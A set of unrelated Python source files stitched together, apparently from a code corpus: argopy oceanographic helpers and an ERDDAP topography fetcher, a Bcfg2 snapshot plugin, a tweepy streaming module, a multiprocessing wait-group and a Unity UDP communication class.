errors: 'raise'
Possibly raises a ValueError exception, otherwise fails silently.
Returns
-------
bool
True if wmo is indeed a list of integers
"""
# Make sure we deal with a list
if not isinstance(lst, list):
if isinstance(lst, np.ndarray):
lst = list(lst)
else:
lst = [lst]
# Error message:
# msg = "WMO must be an integer or an iterable with elements that can be casted as integers"
msg = "WMO must be a single or a list of 5/7 digit positive numbers"
# Then try to cast list elements as integers, return True if ok
result = True
try:
for x in lst:
if not str(x).isdigit():
result = False
if (len(str(x)) != 5) and (len(str(x)) != 7):
result = False
if int(x) <= 0:
result = False
except Exception:
result = False
if errors == "raise":
raise ValueError(msg)
if not result and errors == "raise":
raise ValueError(msg)
else:
return result
# def docstring(value):
# """Replace one function docstring
#
# To be used as a decorator
# """
# def _doc(func):
# func.__doc__ = value
# return func
# return _doc
def warnUnless(ok, txt):
""" Decorator to raise warning unless condition is True
This function must be used as a decorator
Parameters
----------
ok: bool
Condition to raise the warning or not
txt: str
Text to display in the warning
"""
def inner(fct):
def wrapper(*args, **kwargs):
warnings.warn("%s %s" % (fct.__name__, txt))
return fct(*args, **kwargs)
return wrapper
if not ok:
return inner
else:
return lambda f: f
@contextlib.contextmanager
def modified_environ(*remove, **update):
"""
Temporarily updates the ``os.environ`` dictionary in-place.
The ``os.environ`` dictionary is updated in-place so that the modification
is sure to work in all situations.
:param remove: Environment variables to remove.
:param update: Dictionary of environment variables and values to add/update.
"""
# Source: https://github.com/laurent-laporte-pro/stackoverflow-q2059482
env = os.environ
update = update or {}
remove = remove or []
# List of environment variables being updated or removed.
stomped = (set(update.keys()) | set(remove)) & set(env.keys())
# Environment variables and values to restore on exit.
update_after = {k: env[k] for k in stomped}
# Environment variables and values to remove on exit.
remove_after = frozenset(k for k in update if k not in env)
try:
env.update(update)
[env.pop(k, None) for k in remove]
yield
finally:
env.update(update_after)
[env.pop(k) for k in remove_after]
def toYearFraction(this_date: pd._libs.tslibs.timestamps.Timestamp = pd.to_datetime('now', utc=True)):
""" Compute decimal year, robust to leap years, precision to the second
Compute the fraction of the year a given timestamp corresponds to.
The "fraction of the year" goes:
- from 0 on 01-01T00:00:00.000 of the year
- to 1 on the 01-01T00:00:00.000 of the following year
1 second corresponds to the number of days in the year times 86400.
The faction of the year is rounded to 10-digits in order to have a "second" precision.
See discussion here: https://github.com/euroargodev/argodmqc_owc/issues/35
Parameters
----------
pd._libs.tslibs.timestamps.Timestamp
Returns
-------
float
"""
if "UTC" in [this_date.tzname() if not this_date.tzinfo is None else ""]:
startOfThisYear = pd.to_datetime("%i-01-01T00:00:00.000" % this_date.year, utc=True)
else:
startOfThisYear = pd.to_datetime("%i-01-01T00:00:00.000" % this_date.year)
yearDuration_sec = (startOfThisYear + pd.offsets.DateOffset(years=1) - startOfThisYear).total_seconds()
yearElapsed_sec = (this_date - startOfThisYear).total_seconds()
fraction = yearElapsed_sec / yearDuration_sec
fraction = np.round(fraction, 10)
return this_date.year + fraction
def YearFraction_to_datetime(yf: float):
""" Compute datetime from year fraction
Inverse the toYearFraction() function
Parameters
----------
float
Returns
-------
pd._libs.tslibs.timestamps.Timestamp
"""
year = np.int32(yf)
fraction = yf - year
fraction = np.round(fraction, 10)
startOfThisYear = pd.to_datetime("%i-01-01T00:00:00" % year)
yearDuration_sec = (startOfThisYear + pd.offsets.DateOffset(years=1) - startOfThisYear).total_seconds()
yearElapsed_sec = pd.Timedelta(fraction * yearDuration_sec, unit='s')
return pd.to_datetime(startOfThisYear + yearElapsed_sec, unit='s')
def wrap_longitude(grid_long):
""" Allows longitude (0-360) to wrap beyond the 360 mark, for mapping purposes.
Makes sure that, if the longitude is near the boundary (0 or 360) that we
wrap the values beyond
360 so it appears nicely on a map
This is a refactor between get_region_data and get_region_hist_locations to
avoid duplicate code
source: https://github.com/euroargodev/argodmqc_owc/blob/e174f4538fdae1534c9740491398972b1ffec3ca/pyowc/utilities.py#L80
Parameters
----------
grid_long: array of longitude values
Returns
-------
array of longitude values that can extend past 360
"""
neg_long = np.argwhere(grid_long < 0)
grid_long[neg_long] = grid_long[neg_long] + 360
# if we have data close to upper boundary (360), then wrap some of the data round
# so it appears on the map
top_long = np.argwhere(grid_long >= 320)
if top_long.__len__() != 0:
bottom_long = np.argwhere(grid_long <= 40)
grid_long[bottom_long] = 360 + grid_long[bottom_long]
return grid_long
def wmo2box(wmo_id: int):
""" Convert WMO square box number into a latitude/longitude box
See:
https://en.wikipedia.org/wiki/World_Meteorological_Organization_squares
https://commons.wikimedia.org/wiki/File:WMO-squares-global.gif
Parameters
----------
wmo_id: int
WMO square number, must be between 1000 and 7817
Returns
-------
box: list(int)
[lon_min, lon_max, lat_min, lat_max] bounds to the WMO square number
"""
if wmo_id < 1000 or wmo_id > 7817:
raise ValueError("Invalid WMO square number, must be between 1000 and 7817.")
wmo_id = str(wmo_id)
# "global quadrant" numbers where 1=NE, 3=SE, 5=SW, 7=NW
quadrant = int(wmo_id[0])
if quadrant not in [1, 3, 5 ,7]:
raise ValueError("Invalid WMO square number, 1st digit must be 1, 3, 5 or 7.")
# 'minimum' Latitude square boundary, nearest to the Equator
nearest_to_the_Equator_latitude = int(wmo_id[1])
# 'minimum' Longitude square boundary, nearest to the Prime Meridian
nearest_to_the_Prime_Meridian = int(wmo_id[2:4])
#
dd = 10
if quadrant in [1, 3]:
lon_min = nearest_to_the_Prime_Meridian*dd
lon_max = nearest_to_the_Prime_Meridian*dd+dd
elif quadrant in [5, 7]:
lon_min = -nearest_to_the_Prime_Meridian*dd-dd
lon_max = -nearest_to_the_Prime_Meridian*dd
if quadrant in [1, 7]:
lat_min = nearest_to_the_Equator_latitude*dd
lat_max = nearest_to_the_Equator_latitude*dd+dd
elif quadrant in [3, 5]:
lat_min = -nearest_to_the_Equator_latitude*dd-dd
lat_max = -nearest_to_the_Equator_latitude*dd
box = [lon_min, lon_max, lat_min, lat_max]
return box
def groupby_remap(z, data, z_regridded, z_dim=None, z_regridded_dim="regridded", output_dim="remapped", select='deep', right=False):
""" todo: Need a docstring here !"""
# sub-sampling called in xarray ufunc
def _subsample_bins(x, y, target_values):
# remove all nans from input x and y
idx = np.logical_or(np.isnan(x), np.isnan(y))
x = x[~idx]
y = y[~idx]
ifound = np.digitize(x, target_values, right=right) # ``bins[i-1] <= x < bins[i]``
ifound -= 1 # Because digitize returns a 1-based indexing, we need to remove 1
y_binned = np.ones_like(target_values) * np.nan
for ib, this_ibin in enumerate(np.unique(ifound)):
ix = np.where(ifound == this_ibin)
iselect = ix[-1]
# Map to y value at specific x index in the bin:
if select == 'shallow':
iselect = iselect[0] # min/shallow
mapped_value = y[iselect]
elif select == 'deep':
iselect = iselect[-1] # max/deep
mapped_value = y[iselect]
elif select == 'middle':
iselect = iselect[np.where(x[iselect] >= np.median(x[iselect]))[0][0]] # median/middle
mapped_value = y[iselect]
elif select == 'random':
iselect = iselect[np.random.randint(len(iselect))]
mapped_value = y[iselect]
# or Map to y statistics in the bin:
elif select == 'mean':
mapped_value = np.nanmean(y[iselect])
elif select == 'min':
mapped_value = np.nanmin(y[iselect])
elif select == 'max':
mapped_value = np.nanmax(y[iselect])
elif select == 'median':
mapped_value = np.median(y[iselect])
else:
raise InvalidOption("`select` option has invalid value (%s)" % select)
y_binned[this_ibin] = mapped_value
return y_binned
# infer dim from input
if z_dim is None:
if len(z.dims) != 1:
raise RuntimeError("if z_dim is not specified, x must be a 1D array.")
dim = z.dims[0]
else:
dim = z_dim
# if dataset is passed drop all data_vars that dont contain dim
if isinstance(data, xr.Dataset):
raise ValueError("Dataset input is not supported yet")
# TODO: for a dataset input just apply the function for each appropriate array
if version.parse(xr.__version__) > version.parse("0.15.0"):
kwargs = dict(
input_core_dims=[[dim], [dim], [z_regridded_dim]],
output_core_dims=[[output_dim]],
vectorize=True,
dask="parallelized",
output_dtypes=[data.dtype],
dask_gufunc_kwargs={'output_sizes': {output_dim: len(z_regridded[z_regridded_dim])}},
)
else:
kwargs = dict(
input_core_dims=[[dim], [dim], [z_regridded_dim]],
output_core_dims=[[output_dim]],
vectorize=True,
dask="parallelized",
output_dtypes=[data.dtype],
output_sizes={output_dim: len(z_regridded[z_regridded_dim])},
)
remapped = xr.apply_ufunc(_subsample_bins, z, data, z_regridded, **kwargs)
remapped.coords[output_dim] = z_regridded.rename({z_regridded_dim: output_dim}).coords[output_dim]
return remapped
class TopoFetcher():
""" Fetch topographic data through an ERDDAP server for an ocean rectangle
Example:
>>> from argopy import TopoFetcher
>>> box = [-75, -45, 20, 30] # Lon_min, lon_max, lat_min, lat_max
>>> ds = TopoFetcher(box).to_xarray()
>>> ds = TopoFetcher(box, ds='gebco', stride=[10, 10], cache=True).to_xarray()
"""
class ERDDAP():
def __init__(self, server: str, protocol: str = 'tabledap'):
self.server = server
self.protocol = protocol
self.response = 'nc'
self.dataset_id = ''
self.constraints = ''
def __init__(
self,
box: list,
ds: str = "gebco",
cache: bool = False,
cachedir: str = "",
api_timeout: int = 0,
stride: list = [1, 1],
**kwargs,
):
""" Instantiate an ERDDAP topo data fetcher
Parameters
----------
ds: str (optional), default: 'gebco'
Dataset to load:
- 'gebco' will load the GEBCO_2020 Grid, a continuous terrain model for oceans and land at 15 arc-second intervals
stride: list, default [1, 1]
Strides along longitude and latitude. This allows to change the output resolution
cache: bool (optional)
Cache data or not (default: False)
cachedir: str (optional)
Path to cache folder
api_timeout: int (optional)
Erddap request time out in seconds. Set to OPTIONS['api_timeout'] by default.
"""
timeout = OPTIONS["api_timeout"] if api_timeout == 0 else api_timeout
self.fs = httpstore(cache=cache, cachedir=cachedir, timeout=timeout, size_policy='head')
self.definition = "Erddap topographic data fetcher"
self.BOX = box
self.stride = stride
if ds == "gebco":
self.definition = "NOAA erddap gebco data fetcher for a space region"
self.server = 'https://coastwatch.pfeg.noaa.gov/erddap'
self.server_name = 'NOAA'
self.dataset_id = 'gebco'
self._init_erddap()
def _init_erddap(self):
# Init erddap
self.erddap = self.ERDDAP(server=self.server, protocol="griddap")
self.erddap.response = (
"nc"
)
if self.dataset_id == "gebco":
self.erddap.dataset_id = "GEBCO_2020"
else:
raise ValueError(
"Invalid database short name for %s erddap" % self.server_name
)
return self
def _cname(self) -> str:
""" Fetcher one line string definition helper """
cname = "?"
if hasattr(self, "BOX"):
BOX = self.BOX
cname = ("[x=%0.2f/%0.2f; y=%0.2f/%0.2f]") % (
BOX[0],
BOX[1],
BOX[2],
BOX[3],
)
return cname
def __repr__(self):
summary = ["<topofetcher.erddap>"]
summary.append("Name: %s" % self.definition)
summary.append("API: %s" % self.server)
summary.append("Domain: %s" % format_oneline(self.cname()))
return "\n".join(summary)
def cname(self):
""" Return a unique string defining the constraints """
return self._cname()
@property
def cachepath(self):
""" Return path to cached file(s) for this request
Returns
-------
list(str)
"""
return [self.fs.cachepath(uri) for uri in self.uri]
def define_constraints(self):
""" Define request constraints """
# Eg: https://coastwatch.pfeg.noaa.gov/erddap/griddap/GEBCO_2020.nc?elevation%5B(34):5:(42)%5D%5B(-21):7:(-12)%5D
self.erddap.constraints = "%s(%0.2f):%i:(%0.2f)%s%s(%0.2f):%i:(%0.2f)%s" % (
"%5B", self.BOX[2], self.stride[1], self.BOX[3], "%5D",
"%5B", self.BOX[0], self.stride[0], self.BOX[1], "%5D")
return None
# @property
# def _minimal_vlist(self):
# """ Return the minimal list of variables to retrieve """
# vlist = list()
# vlist.append("latitude")
# vlist.append("longitude")
# vlist.append("elevation")
# return vlist
def get_url(self):
""" Return the URL to download data requested
Returns
-------
str
"""
# First part of the URL:
protocol = self.erddap.protocol
dataset_id = self.erddap.dataset_id
response = self.erddap.response
url = f"{self.erddap.server}/{protocol}/{dataset_id}.{response}?"
# Add variables to retrieve:
variables = ["elevation"]
variables = ",".join(variables)
url += f"{variables}"
# Add constraints:
self.define_constraints() # Define constraint to select this box of data (affect self.erddap.constraints)
url += f"{self.erddap.constraints}"
return url
@property
def uri(self):
""" List of files to load for a request
Returns
-------
list(str)
"""
return [self.get_url()]
def to_xarray(self, errors: str = 'ignore'):
""" Load Topographic data and return a xarray.DataSet """
# Download data
if len(self.uri) == 1:
ds = self.fs.open_dataset(self.uri[0])
return ds
def load(self, errors: str = 'ignore'):
""" Load Topographic data and return a xarray.DataSet """
return self.to_xarray(errors=errors)
|
Snapshots.py
|
import logging
import difflib
import Bcfg2.Server.Plugin
import Bcfg2.Server.Snapshots
import Bcfg2.Logger
from Bcfg2.Server.Snapshots.model import Snapshot
import sys
import time
import threading
# Compatibility import
from Bcfg2.Bcfg2Py3k import Queue, u_str, b64decode
logger = logging.getLogger('Snapshots')
ftypes = ['ConfigFile', 'SymLink', 'Directory']
datafields = {
'Package': ['version'],
'Path': ['type'],
'Service': ['status'],
'ConfigFile': ['owner', 'group', 'perms'],
'Directory': ['owner', 'group', 'perms'],
'SymLink': ['to'],
}
def build_snap_ent(entry):
basefields = []
if entry.tag in ['Package', 'Service']:
basefields += ['type']
desired = dict([(key, u_str(entry.get(key))) for key in basefields])
state = dict([(key, u_str(entry.get(key))) for key in basefields])
desired.update([(key, u_str(entry.get(key))) for key in \
datafields[entry.tag]])
if entry.tag == 'ConfigFile' or \
((entry.tag == 'Path') and (entry.get('type') == 'file')):
if entry.text == None:
desired['contents'] = None
else:
if entry.get('encoding', 'ascii') == 'ascii':
desired['contents'] = u_str(entry.text)
else:
desired['contents'] = u_str(b64decode(entry.text))
if 'current_bfile' in entry.attrib:
state['contents'] = u_str(b64decode(entry.get('current_bfile')))
elif 'current_bdiff' in entry.attrib:
diff = b64decode(entry.get('current_bdiff'))
state['contents'] = u_str( \
'\n'.join(difflib.restore(diff.split('\n'), 1)))
state.update([(key, u_str(entry.get('current_' + key, entry.get(key)))) \
for key in datafields[entry.tag]])
if entry.tag in ['ConfigFile', 'Path'] and entry.get('exists', 'true') == 'false':
state = None
return [desired, state]
class Snapshots(Bcfg2.Server.Plugin.Statistics):
name = 'Snapshots'
experimental = True
def __init__(self, core, datastore):
Bcfg2.Server.Plugin.Statistics.__init__(self, core, datastore)
self.session = Bcfg2.Server.Snapshots.setup_session(core.cfile)
self.work_queue = Queue()
self.loader = threading.Thread(target=self.load_snapshot)
self.loader.start()
def load_snapshot(self):
while self.running:
try:
(metadata, data) = self.work_queue.get(block=True, timeout=5)
except:
continue
self.statistics_from_old_stats(metadata, data)
def process_statistics(self, metadata, data):
return self.work_queue.put((metadata, data))
def statistics_from_old_stats(self, metadata, xdata):
# entries are name -> (modified, correct, start, desired, end)
# not sure we can get all of this from old format stats
t1 = time.time()
entries = dict([('Package', dict()),
('Service', dict()), ('Path', dict())])
extra = dict([('Package', dict()), ('Service', dict()),
('Path', dict())])
bad = []
state = xdata.find('.//Statistics')
correct = state.get('state') == 'clean'
revision = u_str(state.get('revision', '-1'))
for entry in state.find('.//Bad'):
data = [False, False, u_str(entry.get('name'))] \
+ build_snap_ent(entry)
if entry.tag in ftypes:
etag = 'Path'
else:
etag = entry.tag
entries[etag][entry.get('name')] = data
for entry in state.find('.//Modified'):
if entry.tag in ftypes:
etag = 'Path'
else:
etag = entry.tag
if entry.get('name') in entries[etag]:
data = [True, False, u_str(entry.get('name'))] + \
build_snap_ent(entry)
else:
data = [True, False, u_str(entry.get('name'))] + \
build_snap_ent(entry)
for entry in state.find('.//Extra'):
if entry.tag in datafields:
data = build_snap_ent(entry)[1]
ename = u_str(entry.get('name'))
data['name'] = ename
extra[entry.tag][ename] = data
else:
print("extra", entry.tag, entry.get('name'))
t2 = time.time()
snap = Snapshot.from_data(self.session, correct, revision,
metadata, entries, extra)
self.session.add(snap)
self.session.commit()
t3 = time.time()
logger.info("Snapshot storage took %fs" % (t3 - t2))
return True
|
my_tweepy.py
|
# Tweepy
# Copyright 2009-2010 Joshua Roesslein
# See LICENSE for details.
# Appengine users: https://developers.google.com/appengine/docs/python/sockets/#making_httplib_use_sockets
from __future__ import absolute_import, print_function
import logging
import re
import requests
import sys
from requests.exceptions import Timeout
from threading import Thread
from time import sleep
import six
import ssl
from tweepy.models import Status
from tweepy.api import API
from tweepy.error import TweepError
from tweepy.utils import import_simplejson
json = import_simplejson()
STREAM_VERSION = '1.1'
class StreamListener(object):
def __init__(self, api=None):
self.api = api or API()
def on_connect(self):
"""Called once connected to streaming server.
This will be invoked once a successful response
is received from the server. Allows the listener
to perform some work prior to entering the read loop.
"""
pass
def on_data(self, raw_data):
"""Called when raw data is received from connection.
Override this method if you wish to manually handle
the stream data. Return False to stop stream and close connection.
"""
data = json.loads(raw_data)
if 'in_reply_to_status_id' in data:
status = Status.parse(self.api, data)
if self.on_status(status) is False:
return False
elif 'delete' in data:
delete = data['delete']['status']
if self.on_delete(delete['id'], delete['user_id']) is False:
return False
elif 'event' in data:
status = Status.parse(self.api, data)
if self.on_event(status) is False:
return False
elif 'direct_message' in data:
status = Status.parse(self.api, data)
if self.on_direct_message(status) is False:
return False
elif 'friends' in data:
if self.on_friends(data['friends']) is False:
return False
elif 'limit' in data:
if self.on_limit(data['limit']['track']) is False:
return False
elif 'disconnect' in data:
if self.on_disconnect(data['disconnect']) is False:
return False
elif 'warning' in data:
if self.on_warning(data['warning']) is False:
return False
else:
logging.error("Unknown message type: " + str(raw_data))
def keep_alive(self):
"""Called when a keep-alive arrived"""
return
def on_status(self, status):
"""Called when a new status arrives"""
return
def on_exception(self, exception):
"""Called when an unhandled exception occurs."""
return
def on_delete(self, status_id, user_id):
"""Called when a delete notice arrives for a status"""
return
def on_event(self, status):
"""Called when a new event arrives"""
return
def on_direct_message(self, status):
"""Called when a new direct message arrives"""
return
def on_friends(self, friends):
"""Called when a friends list arrives.
friends is a list that contains user_id
"""
return
def on_limit(self, track):
"""Called when a limitation notice arrives"""
return
def on_error(self, status_code):
"""Called when a non-200 status code is returned"""
return False
def on_timeout(self):
"""Called when stream connection times out"""
return
def on_disconnect(self, notice):
"""Called when twitter sends a disconnect notice
Disconnect codes are listed here:
https://dev.twitter.com/docs/streaming-apis/messages#Disconnect_messages_disconnect
"""
return
def on_warning(self, notice):
"""Called when a disconnection warning message arrives"""
return
class ReadBuffer(object):
"""Buffer data from the response in a smarter way than httplib/requests can.
Tweets are roughly in the 2-12kb range, averaging around 3kb.
Requests/urllib3/httplib/socket all use socket.read, which blocks
until enough data is returned. On some systems (eg google appengine), socket
reads are quite slow. To combat this latency we can read big chunks,
but the blocking part means we won't get results until enough tweets
have arrived. That may not be a big deal for high throughput systems.
For low throughput systems we don't want to sacrafice latency, so we
use small chunks so it can read the length and the tweet in 2 read calls.
"""
def __init__(self, stream, chunk_size, encoding='utf-8'):
self._stream = stream
self._buffer = six.b('')
self._chunk_size = chunk_size
self._encoding = encoding
def read_len(self, length):
while not self._stream.closed:
if len(self._buffer) >= length:
return self._pop(length)
read_len = max(self._chunk_size, length - len(self._buffer))
self._buffer += self._stream.read(read_len)
return six.b('')
def read_line(self, sep=six.b('\n')):
"""Read the data stream until a given separator is found (default \n)
:param sep: Separator to read until. Must by of the bytes type (str in python 2,
bytes in python 3)
:return: The str of the data read until sep
"""
start = 0
while not self._stream.closed:
loc = self._buffer.find(sep, start)
if loc >= 0:
return self._pop(loc + len(sep))
else:
start = len(self._buffer)
self._buffer += self._stream.read(self._chunk_size)
return six.b('')
def _pop(self, length):
r = self._buffer[:length]
self._buffer = self._buffer[length:]
return r.decode(self._encoding)
class Stream(object):
host = 'stream.twitter.com'
def __init__(self, auth, listener, **options):
self.auth = auth
self.listener = listener
self.running = False
self.timeout = options.get("timeout", 300.0)
self.retry_count = options.get("retry_count")
# values according to
# https://dev.twitter.com/docs/streaming-apis/connecting#Reconnecting
self.retry_time_start = options.get("retry_time", 5.0)
self.retry_420_start = options.get("retry_420", 60.0)
self.retry_time_cap = options.get("retry_time_cap", 320.0)
self.snooze_time_step = options.get("snooze_time", 0.25)
self.snooze_time_cap = options.get("snooze_time_cap", 16)
# The default socket.read size. Default to less than half the size of
# a tweet so that it reads tweets with the minimal latency of 2 reads
# per tweet. Values higher than ~1kb will increase latency by waiting
# for more data to arrive but may also increase throughput by doing
# fewer socket read calls.
self.chunk_size = options.get("chunk_size", 512)
self.verify = options.get("verify", True)
self.api = API()
self.headers = options.get("headers") or {}
self.new_session()
self.body = None
self.retry_time = self.retry_time_start
self.snooze_time = self.snooze_time_step
def new_session(self):
self.session = requests.Session()
self.session.headers = self.headers
self.session.params = None
def _run(self):
# Authenticate
url = "https://%s%s" % (self.host, self.url)
# Connect and process the stream
error_counter = 0
resp = None
exc_info = None
while self.running:
if self.retry_count is not None:
if error_counter > self.retry_count:
# quit if error count greater than retry count
break
try:
auth = self.auth.apply_auth()
resp = self.session.request('POST',
url,
data=self.body,
timeout=self.timeout,
stream=True,
auth=auth,
verify=self.verify)
if resp.status_code != 200:
if self.listener.on_error(resp.status_code) is False:
break
error_counter += 1
if resp.status_code == 420:
self.retry_time = max(self.retry_420_start,
self.retry_time)
sleep(self.retry_time)
self.retry_time = min(self.retry_time * 2,
self.retry_time_cap)
else:
error_counter = 0
self.retry_time = self.retry_time_start
self.snooze_time = self.snooze_time_step
self.listener.on_connect()
self._read_loop(resp)
except (Timeout, ssl.SSLError) as exc:
# This is still necessary, as a SSLError can actually be
# thrown when using Requests
# If it's not time out treat it like any other exception
if isinstance(exc, ssl.SSLError):
if not (exc.args and 'timed out' in str(exc.args[0])):
exc_info = sys.exc_info()
break
if self.listener.on_timeout() is False:
break
if self.running is False:
break
sleep(self.snooze_time)
self.snooze_time = min(self.snooze_time + self.snooze_time_step,
self.snooze_time_cap)
except Exception as exc:
exc_info = sys.exc_info()
# any other exception is fatal, so kill loop
break
# cleanup
self.running = False
if resp:
resp.close()
self.new_session()
if exc_info:
# call a handler first so that the exception can be logged.
self.listener.on_exception(exc_info[1])
six.reraise(*exc_info)
def _data(self, data):
if self.listener.on_data(data) is False:
self.running = False
def _read_loop(self, resp):
charset = resp.headers.get('content-type', default='')
enc_search = re.search('charset=(?P<enc>\S*)', charset)
if enc_search is not None:
encoding = enc_search.group('enc')
else:
encoding = 'utf-8'
buf = ReadBuffer(resp.raw, self.chunk_size, encoding=encoding)
while self.running and not resp.raw.closed:
length = 0
while self.running and not resp.raw.closed:
line = buf.read_line()
if not line:
# keep-alive new lines are expected
if self.listener.keep_alive() is False:
self.running = False
elif line.strip().isdigit():
length = int(line)
break
else:
raise TweepError('Expecting length, unexpected value found')
next_status_obj = buf.read_len(length)
if self.running and next_status_obj:
self._data(next_status_obj)
# # Note: keep-alive newlines might be inserted before each length value.
# # read until we get a digit...
# c = b'\n'
# for c in resp.iter_content(decode_unicode=True):
# if c == b'\n':
# continue
# break
#
# delimited_string = c
#
# # read rest of delimiter length..
# d = b''
# for d in resp.iter_content(decode_unicode=True):
# if d != b'\n':
# delimited_string += d
# continue
# break
#
# # read the next twitter status object
# if delimited_string.decode('utf-8').strip().isdigit():
# status_id = int(delimited_string)
# next_status_obj = resp.raw.read(status_id)
# if self.running:
# self._data(next_status_obj.decode('utf-8'))
if resp.raw.closed:
self.on_closed(resp)
def _start(self, async):
self.running = True
if async:
self._thread = Thread(target=self._run)
self._thread.start()
else:
self._run()
def on_closed(self, resp):
""" Called when the response has been closed by Twitter """
pass
def userstream(self,
stall_warnings=False,
_with=None,
replies=None,
track=None,
locations=None,
async=False,
encoding='utf8'):
self.session.params = {'delimited': 'length'}
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%s/user.json' % STREAM_VERSION
self.host = 'userstream.twitter.com'
if stall_warnings:
self.session.params['stall_warnings'] = stall_warnings
if _with:
self.session.params['with'] = _with
if replies:
self.session.params['replies'] = replies
if locations and len(locations) > 0:
if len(locations) % 4 != 0:
raise TweepError("Wrong number of locations points, "
"it has to be a multiple of 4")
self.session.params['locations'] = ','.join(['%.2f' % l for l in locations])
if track:
self.session.params['track'] = u','.join(track).encode(encoding)
self._start(async)
def firehose(self, count=None, async=False):
self.session.params = {'delimited': 'length'}
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%s/statuses/firehose.json' % STREAM_VERSION
if count:
self.url += '&count=%s' % count
self._start(async)
def retweet(self, async=False):
self.session.params = {'delimited': 'length'}
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%s/statuses/retweet.json' % STREAM_VERSION
self._start(async)
def sample(self, async=False, languages=None, stall_warnings=False):
self.session.params = {'delimited': 'length'}
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%s/statuses/sample.json' % STREAM_VERSION
if languages:
self.session.params['language'] = ','.join(map(str, languages))
if stall_warnings:
self.session.params['stall_warnings'] = 'true'
self._start(async)
def filter(self, follow=None, track=None, async=False, locations=None,
stall_warnings=False, languages=None, encoding='utf8', filter_level=None):
self.body = {}
self.session.headers['Content-type'] = "application/x-www-form-urlencoded"
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%s/statuses/filter.json' % STREAM_VERSION
if follow:
self.body['follow'] = u','.join(follow).encode(encoding)
if track:
self.body['track'] = u','.join(track).encode(encoding)
if locations and len(locations) > 0:
if len(locations) % 4 != 0:
raise TweepError("Wrong number of locations points, "
"it has to be a multiple of 4")
self.body['locations'] = u','.join(['%.4f' % l for l in locations])
if stall_warnings:
self.body['stall_warnings'] = stall_warnings
if languages:
self.body['language'] = u','.join(map(str, languages))
if filter_level:
self.body['filter_level'] = filter_level.encode(encoding)
self.session.params = {'delimited': 'length'}
self.host = 'stream.twitter.com'
self._start(async)
def sitestream(self, follow, stall_warnings=False,
with_='user', replies=False, async=False):
self.body = {}
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%s/site.json' % STREAM_VERSION
self.body['follow'] = u','.join(map(six.text_type, follow))
self.body['delimited'] = 'length'
if stall_warnings:
self.body['stall_warnings'] = stall_warnings
if with_:
self.body['with'] = with_
if replies:
self.body['replies'] = replies
self._start(async)
def disconnect(self):
if self.running is False:
return
self.running = False
|
wait_group_process.py
|
from multiprocessing import Condition, Value, Process
import time
# note this is the equivalent of a waitgroup for a process instead of a thread
class WaitGroupProcess:
def __init__(self, cv, wait_count):
self.cv = cv
self.wait_count = wait_count
def add(self, count):
self.cv.acquire()
self.wait_count.value += count
self.cv.release()
def done(self):
self.cv.acquire()
if self.wait_count.value > 0:
self.wait_count.value -= 1
if self.wait_count.value == 0:
self.cv.notify_all()
self.cv.release()
def wait(self):
self.cv.acquire()
while self.wait_count.value > 0:
self.cv.wait()
self.cv.release()
def sleep_and_done(condC, wc, time_to_sleep):
wg = WaitGroupProcess(condC, wc)
time.sleep(time_to_sleep)
wg.done()
print("Process called done")
if __name__ == '__main__':
wait_count = Value('i', 0, lock=False)
cv = Condition()
wait_group_process = WaitGroupProcess(cv, wait_count)
wait_group_process.add(3)
Process(target=sleep_and_done, args=(cv, wait_count, 2)).start()
Process(target=sleep_and_done, args=(cv, wait_count, 5)).start()
Process(target=sleep_and_done, args=(cv, wait_count, 7)).start()
wait_group_process.wait()
print("All processes complete")
|
UdpComms.py
|
# Created by Youssef Elashry to allow two-way communication between Python3 and Unity to send and receive strings
# Feel free to use this in your individual or commercial projects BUT make sure to reference me as: Two-way communication between Python 3 and Unity (C#) - Y. T. Elashry
# It would be appreciated if you send me how you have used this in your projects (e.g. Machine Learning) at youssef.elashry@gmail.com
# Use at your own risk
# Use under the Apache License 2.0
import io
from PIL import Image, ImageDraw
import numpy as np
import cv2 as cv
class UdpComms():
def __init__(self,udpIP,portTX,portRX,enableRX=False,suppressWarnings=True):
"""
Constructor
:param udpIP: Must be string e.g. "127.0.0.1"
:param portTX: integer number e.g. 8000. Port to transmit from i.e From Python to other application
:param portRX: integer number e.g. 8001. Port to receive on i.e. From other application to Python
:param enableRX: When False you may only send from Python and not receive. If set to True a thread is created to enable receiving of data
:param suppressWarnings: Stop printing warnings if not connected to other application
"""
import socket
self.udpIP = udpIP
self.udpSendPort = portTX
self.udpRcvPort = portRX
self.enableRX = enableRX
self.suppressWarnings = suppressWarnings # when true warnings are suppressed
self.isDataReceived = False
self.dataRX = None
# Connect via UDP
self.udpSock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # internet protocol, udp (DGRAM) socket
self.udpSock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # allows the address/port to be reused immediately instead of it being stuck in the TIME_WAIT state waiting for late packets to arrive.
self.udpSock.bind((udpIP, portRX))
# Create Receiving thread if required
if enableRX:
import threading
self.rxThread = threading.Thread(target=self.ReadUdpThreadFunc, daemon=True)
self.rxThread.start()
def __del__(self):
self.CloseSocket()
def CloseSocket(self):
# Function to close socket
self.udpSock.close()
def SendData(self, strToSend):
# Use this function to send string to C#
self.udpSock.sendto(bytes(strToSend,'utf-8'), (self.udpIP, self.udpSendPort))
def ReceiveData(self):
"""
Should not be called by user
Function BLOCKS until data is returned from C#. It then attempts to convert it to string and returns on successful conversion.
An warning/error is raised if:
- Warning: Not connected to C# application yet. Warning can be suppressed by setting suppressWarning=True in constructor
- Error: If data receiving procedure or conversion to string goes wrong
- Error: If user attempts to use this without enabling RX
:return: returns None on failure or the received string on success
"""
if not self.enableRX: # if RX is not enabled, raise error
raise ValueError("Attempting to receive data without enabling this setting. Ensure this is enabled from the constructor")
data = None
try:
data, _ = self.udpSock.recvfrom(65536)
byteio = io.BytesIO(data)
img = Image.open(byteio)
img2 = img.convert('RGB')
opencv_img = np.array(img2)
data = opencv_img[:, :, ::-1].copy()
#cv.imwrite('str(name)' + '.jpg', opencv_img)
except WindowsError as e:
if e.winerror == 10054: # An error occurs if you try to receive before connecting to other application
if not self.suppressWarnings:
print("Are You connected to the other application? Connect to it!")
else:
pass
else:
raise ValueError("Unexpected Error. Are you sure that the received data can be converted to a string")
return data
def ReadUdpThreadFunc(self): # Should be called from thread
"""
This function should be called from a thread [Done automatically via constructor]
